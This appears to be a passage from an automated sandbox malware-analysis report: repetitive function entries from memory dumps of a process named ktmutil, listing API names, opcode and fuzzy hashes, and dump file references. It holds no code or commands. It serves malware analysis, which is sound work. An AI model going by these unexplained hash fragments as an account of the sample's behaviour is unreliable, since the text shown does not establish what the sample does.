                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: aaf37d85049db96e7b3b01076ccea28055efda21774638674b635c7cda7f6a90
                                                • Instruction ID: 70b71540fb835566771e1996e1562bae778258b2e68c27b8a94376bfea75206b
                                                • Opcode Fuzzy Hash: aaf37d85049db96e7b3b01076ccea28055efda21774638674b635c7cda7f6a90
                                                • Instruction Fuzzy Hash: E601C036A416047FD220EB68DC42FEB77ACDF96310F404509FA1897282DB717941CBE1
                                                Function 001A8190 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 001A81C4
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 4c66793653d15117f357d01f0f2892b2c5ef3b68542122b1a45f0b0588971228
                                                • Instruction ID: 53c2e0b4775d36514d703b5d8a4ba2d37fd7687b73c5d68510157412e023d3eb
                                                • Opcode Fuzzy Hash: 4c66793653d15117f357d01f0f2892b2c5ef3b68542122b1a45f0b0588971228
                                                • Instruction Fuzzy Hash: B5E08C362406047BC220FA99CC01FDBB7ACDFC5765F008016FA08A7242D770BA058BF0
                                                Function 02B94340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c1d7afd86f4ff0f9f7c043d2373a50ce9234ee2d908ba6418c153111c9af85f9
                                                • Instruction ID: 4762c501a4bde1e3e6a954828a79b7f4300238954dac09bab763e49390b8f7f7
                                                • Opcode Fuzzy Hash: c1d7afd86f4ff0f9f7c043d2373a50ce9234ee2d908ba6418c153111c9af85f9
                                                • Instruction Fuzzy Hash: 59900272B0980012914071988894547500597E0301B55C051E0534595C8A148A565361
                                                Function 02B94650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8ee4a30a7446ba33e840894977da9cf21121788d49ce1297df6136e3bab10c78
                                                • Instruction ID: 4042b65e821aac4a4ad8aa79d446a5bd4193d3896c716ca755abb8f84b8dadf4
                                                • Opcode Fuzzy Hash: 8ee4a30a7446ba33e840894977da9cf21121788d49ce1297df6136e3bab10c78
                                                • Instruction Fuzzy Hash: E19002A2B0550042414071988814407700597E1301395C155A06645A1C861889559269
                                                Function 02B92AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6c0d741572058563a29096074194348c3bdb04f872885761c26ef263639ac509
                                                • Instruction ID: f7998c8d5c579ea22c5a750f599a93dd60235732ba95151502e46c113793451b
                                                • Opcode Fuzzy Hash: 6c0d741572058563a29096074194348c3bdb04f872885761c26ef263639ac509
                                                • Instruction Fuzzy Hash: F4900266725400020145B598461450B144597D6351395C055F15265D1CC62189655321
                                                Function 02B92AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5fd1b6e1216fca5b64726af806e11ab5788e66639b1f3293997bdcf8e587f6be
                                                • Instruction ID: 6b65b9a083768d82d25b6a03c04ed7c3438135243c5c3f85a34a2f67c4075558
                                                • Opcode Fuzzy Hash: 5fd1b6e1216fca5b64726af806e11ab5788e66639b1f3293997bdcf8e587f6be
                                                • Instruction Fuzzy Hash: FD900477715400030105F5DC47145071047C7D5351355C071F11355D1CD731CD715131
                                                Function 02B92BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ea975b9f393093c01347e4ca422b11d63e59889c9b490ad3039ac305e93919f9
                                                • Instruction ID: 87d417e195cb1e2df168391a8b600c8161045770696af4eafdabd894ee338072
                                                • Opcode Fuzzy Hash: ea975b9f393093c01347e4ca422b11d63e59889c9b490ad3039ac305e93919f9
                                                • Instruction Fuzzy Hash: FD900272B0940802D15071988424747100587D0301F55C051A0134695D87558B5576A1
                                                Function 02B92BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8315b97f6211b5d7bc2d1676926560f8e21e90aab1ddbdca8009c6ef4bd4a7ab
                                                • Instruction ID: 0c5983b955f6f2924d42ea9f33bdeb94d648edfcc03287008fe44df50b286ae0
                                                • Opcode Fuzzy Hash: 8315b97f6211b5d7bc2d1676926560f8e21e90aab1ddbdca8009c6ef4bd4a7ab
                                                • Instruction Fuzzy Hash: 6B90027270540802D1807198841464B100587D1301F95C055A0135695DCA158B5977A1
                                                Function 02B92BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d48921376e2b30b39c827e0d2fdf17c0d28d1c150f105f66b7685b4129ad4eb4
                                                • Instruction ID: b8a1378d9f900ef9727434b551bd67a880641a07c169e6470917e2373db7165c
                                                • Opcode Fuzzy Hash: d48921376e2b30b39c827e0d2fdf17c0d28d1c150f105f66b7685b4129ad4eb4
                                                • Instruction Fuzzy Hash: D590027270944842D14071988414A47101587D0305F55C051A01746D5D96258E55B661
                                                Function 02B92B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 736d21f54993cc21a1731ebbb0320b15bc319855f43bd7066161bc316053fb17
                                                • Instruction ID: 9be4d90ce5ccecf352afdc10951ee3fb9ea1130caf49de6d4110b37835f85c76
                                                • Opcode Fuzzy Hash: 736d21f54993cc21a1731ebbb0320b15bc319855f43bd7066161bc316053fb17
                                                • Instruction Fuzzy Hash: 6A9002A270640003410571988424617500A87E0201B55C061E11245D1DC52589916125
                                                Function 02B92E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5683c1e29c3b96fc4e020b4353522b6a79861bdc13c6c8e1e2bce31911746900
                                                • Instruction ID: 71251f00d7bae9b218bea10226802e008e19346c27f86de6771df011c4c9e6cd
                                                • Opcode Fuzzy Hash: 5683c1e29c3b96fc4e020b4353522b6a79861bdc13c6c8e1e2bce31911746900
                                                • Instruction Fuzzy Hash: FE900262B0540502D10171988414617100A87D0241F95C062A1134596ECA258A92A131
                                                Function 02B92EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f390687f0af998f5b599cf907650626fb108a6f65dae631fefe69ce2ffdd2f38
                                                • Instruction ID: adb60426389de55df01027e6829dc3965a8832b22c540637efbbba6d076bd493
                                                • Opcode Fuzzy Hash: f390687f0af998f5b599cf907650626fb108a6f65dae631fefe69ce2ffdd2f38
                                                • Instruction Fuzzy Hash: AF9002A270580403D14075988814607100587D0302F55C051A2174596E8A298D516135
                                                Function 02B92FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 45204482ff1850b6f725b2e4a60c34f5ba46889afd8fd59ab8322d1c7391a2ff
                                                • Instruction ID: 6cdf05b2a3e88b2dcf853828a28767b5a06768ea84b0df2a1036e8dd8e60b9df
                                                • Opcode Fuzzy Hash: 45204482ff1850b6f725b2e4a60c34f5ba46889afd8fd59ab8322d1c7391a2ff
                                                • Instruction Fuzzy Hash: 24900262B0540042414071A8C8549075005ABE1211755C161A0AA8591D855989655665
                                                Function 02B92FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3b1371ac81df9ed21ff8c005a0147964d6b5b852934c4e0cd68490af1501c8c0
                                                • Instruction ID: d14a9f2a7916e2d9de4054a1ab7ebaed3344868e5f7f96a464a3eca22895fd5a
                                                • Opcode Fuzzy Hash: 3b1371ac81df9ed21ff8c005a0147964d6b5b852934c4e0cd68490af1501c8c0
                                                • Instruction Fuzzy Hash: 6B900262715C0042D20075A88C24B07100587D0303F55C155A0264595CC91589615521
                                                Function 02B92F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 57b20086111075a7c7f55b62b3669aaf96af6dd1e8698b144fc55707efb502e2
                                                • Instruction ID: a4fa13179dc3ba7d353fbacdf5219a97b48e8dfc17c971ff1ce32fbff46fd82f
                                                • Opcode Fuzzy Hash: 57b20086111075a7c7f55b62b3669aaf96af6dd1e8698b144fc55707efb502e2
                                                • Instruction Fuzzy Hash: 019002A274540442D10071988424B071005C7E1301F55C055E1174595D8619CD526126
                                                Function 02B92CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0a6a2992f239cc3ed9442bda2f039047ed103f819157d7df3e27641f8220f435
                                                • Instruction ID: 3b4ab46545ac8ee8be4a993b9bd4120389eed370d6b43813cb24ccb2821230ef
                                                • Opcode Fuzzy Hash: 0a6a2992f239cc3ed9442bda2f039047ed103f819157d7df3e27641f8220f435
                                                • Instruction Fuzzy Hash: 3390027270540402D10075D89418647100587E0301F55D051A5134596EC66589916131
                                                Function 02B92C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 61e6526833bff28bbde89bede23b1b036bed0ac1d55e1e1def86ed6f20fd0f64
                                                • Instruction ID: 3a7e7580c7b124aec5b2954568fe55267564d08160490927deffbd5fcd0157d5
                                                • Opcode Fuzzy Hash: 61e6526833bff28bbde89bede23b1b036bed0ac1d55e1e1def86ed6f20fd0f64
                                                • Instruction Fuzzy Hash: BB90027270548802D1107198C41474B100587D0301F59C451A4534699D869589917121
                                                Function 02B92C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 311554be54ff15f705e7d30da341261903f36a4f6f3ddb544a6dda05495b7832
                                                • Instruction ID: 431eea5c0ef9bc5287fe1e690bf37a4bf3cf907ce769cec26c9aea65a9cbde20
                                                • Opcode Fuzzy Hash: 311554be54ff15f705e7d30da341261903f36a4f6f3ddb544a6dda05495b7832
                                                • Instruction Fuzzy Hash: 1C90027270540842D10071988414B47100587E0301F55C056A0234695D8615C9517521
                                                Function 02B92DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9977b5b3f34b287140c73870a58d80925c06a14b8da8326ff31722d75f85b626
                                                • Instruction ID: 035ee7eeb54fcaa2c35fce56517ab6115ebc94625630397479913dd0c19c4d4a
                                                • Opcode Fuzzy Hash: 9977b5b3f34b287140c73870a58d80925c06a14b8da8326ff31722d75f85b626
                                                • Instruction Fuzzy Hash: 2390027270540413D11171988514707100987D0241F95C452A0534599D96568A52A121
                                                Function 02B92DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: dce4c5fa09dcdc04e2c7916d6c632aa59911719073e599c2f7ebba2ff31d907a
                                                • Instruction ID: 6576202104f9f445f8c12762491e6f3af1ce9b84f475ab74fad42752f0edc808
                                                • Opcode Fuzzy Hash: dce4c5fa09dcdc04e2c7916d6c632aa59911719073e599c2f7ebba2ff31d907a
                                                • Instruction Fuzzy Hash: 49900262746441525545B1988414507500697E0241795C052A1524991C85269956D621
                                                Function 02B92D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 993d437a363e144f0607923a8c517a1e3634e92025f23b81b92a4bb6188210a5
                                                • Instruction ID: 8fbbcda9e8f23dbb6904e0b19606fac0beaea8d6fd72c3b695846daecdab6b07
                                                • Opcode Fuzzy Hash: 993d437a363e144f0607923a8c517a1e3634e92025f23b81b92a4bb6188210a5
                                                • Instruction Fuzzy Hash: 1690026270540003D140719894286075005D7E1301F55D051E0524595CD91589565222
                                                Function 02B92D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1713ec8c4b264efd1ab43f1e697eb54c5a997439bd554f8c8837881dca77f27b
                                                • Instruction ID: 04175fcc072fa99794ca57b50f8e36bd02c3db25d613d557c036423b33d30f44
                                                • Opcode Fuzzy Hash: 1713ec8c4b264efd1ab43f1e697eb54c5a997439bd554f8c8837881dca77f27b
                                                • Instruction Fuzzy Hash: 6290026A71740002D1807198941860B100587D1202F95D455A0125599CC91589695321
                                                Function 02B935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ccc07b9f670200bd0164d7001b6dbdf0bd7954671ac47582847ca8ffb8c15f35
                                                • Instruction ID: 248180e0338d7d3bc5efa06cb011143eb1fc153abe309835d1f0b337794939a3
                                                • Opcode Fuzzy Hash: ccc07b9f670200bd0164d7001b6dbdf0bd7954671ac47582847ca8ffb8c15f35
                                                • Instruction Fuzzy Hash: 5A900272B0950402D10071988524707200587D0201F65C451A05345A9D87958A5165A2
                                                Function 02B939B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                • Associated: 00000009.00000002.4588745880.0000000002C49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002C4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b20000_ktmutil.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 51f86ae6fb58b3527be00d253776eb026a37150111c338d24e1427f6b7e50efa
                                                • Instruction ID: 9221819732efcf71027b13f09f8b1394d978bac5b678d62a23545ebf40041ea9
                                                • Opcode Fuzzy Hash: 51f86ae6fb58b3527be00d253776eb026a37150111c338d24e1427f6b7e50efa
                                                • Instruction Fuzzy Hash: C790026274945102D150719C84146175005A7E0201F55C061A09245D5D855589556221
                                                Function 00190D48 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph
